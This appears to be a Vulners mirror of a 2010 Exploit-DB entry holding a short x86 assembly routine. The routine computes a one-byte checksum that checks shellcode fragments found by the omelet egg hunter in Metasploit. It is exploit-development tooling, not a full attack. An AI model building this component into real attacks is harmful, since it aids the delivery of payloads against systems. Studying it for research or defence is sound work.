Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Shellcode Checksum Routine

🗓️ 02 Sep 2010 00:00:00Reported by dijital1Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

Shellcode Checksum Routine for Omelet Hunter in MSF, 1 byte checksum for 122 bytes, implemented in Metasploit Framewor

Code
;Exploit Title: Shellcode Checksum Routine
;Date: Sept 1 2010
;Author: dijital1
;Software Link:  http://www.ciphermonk.net/code/exploits/shellcode-checksum.asm
;Tested on: Omelet Hunter Shellcode in MSF
;"|------------------------------------------------------------------|"
;"|                         __               __                      |"
;"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
;"|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
;"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
;"| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
;"|                                                                  |"
;"|                                       http://www.corelan.be:8800 |"
;"|                                              [email protected] |"
;"|                                                                  |"
;"|-------------------------------------------------[ EIP Hunters ]--|"
;"               -= Egg Hunter Checksum Routine     - dijital1 =-     "

[BITS 32]

;Author: Ron Henry - dijital1
;Email: [email protected]
;Site: http://www.ciphermonk.net
;Greetz to Exploit-db and Team Corelan

;Ok... couple of assumptions with this code. First, we're using a single
;byte as the checksum which gives us a 1 in 255 or ~0.39% chance of a 
;collision.
;We consider this a worthwhile risk given the overall size of the code; 18 bytes.

;There are a couple ways to implement this, but a good example is how it
;was used in Peter Van Eeckhoutte's omelet egghunter mixin that was recently
;added to the Metasploit Framework.

;We're using a 1 byte footer at the end of the shellcode that contains the
;checksum generated at shellcode creation.

; Variables eax: accumulator
;           edx: points to current byte in shellcode
;           ecx: counter

egg_size equ 0x7a       ;we're testing 122 bytes in this instance

find_egg:

xor ecx, ecx            ;zero the counter
xor eax, eax            ;zero the accumlator

calc_chksum_loop:
add al, byte [edx+ecx]  ;add the byte to running total
inc ecx                 ;increment the counter
cmp cl, egg_size        ;cmp counter to egg_size
jnz calc_chksum_loop    ;if it's not equal repeat

test_ckksum:
cmp al, byte [edx+ecx]  ;cmp eax with 1 byte checksum
jnz find_egg            ;search for another egg if checksum is bogus

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Sep 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
shellcodeomelet huntermsfchecksum1 bytemetasploit122 bytessecurityexploit
23